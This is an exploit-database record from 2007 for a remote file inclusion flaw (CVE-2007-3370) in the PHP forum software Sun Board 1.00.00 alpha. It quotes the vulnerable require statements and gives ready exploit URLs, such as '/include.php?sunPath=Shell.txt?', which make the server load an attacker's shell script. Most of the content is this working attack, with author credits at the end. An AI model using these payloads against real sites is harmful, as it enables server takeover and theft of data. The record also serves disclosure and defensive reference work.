Sun Board 1.00.00 alpha - Remote File Inclusion
Author: GoLd_M
type: webapps
platform: php
port:
date_added: 2007-06-21
date_updated: 2016-10-05
verified: 1
codes: OSVDB-36282;CVE-2007-3370;OSVDB-36281
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comsunboard.zip
# Sun Board 1.00.00 Alpha Multiple Remote File Inclusion Vulnerabilities
# D.Script :
http://mesh.dl.sourceforge.net/sourceforge/sunboard/sunboard.zip
# V.Code :
require $sunPath.'config.php';
require_once $sunPath.'dbms/'.$dbtype.'.php';
# In :
/include.php
# Exploits :
/include.php?sunPath=Shell.txt?
# V.Code 2 :
<?php require_once $dir.'/lib.php'; ?>
# In :
/skin/board/default/doctype.php
# Exploits 2 :
/skin/board/default/doctype.php?dir=Shell.txt?
# Discovered by:
GoLd_M = [Mahmood_ali]
# Homepage:
http://www.Tryag.Com/cc
# Sp.Thanx To :
Tryag-Team & Asb-May's Group
# milw0rm.com [2007-06-22]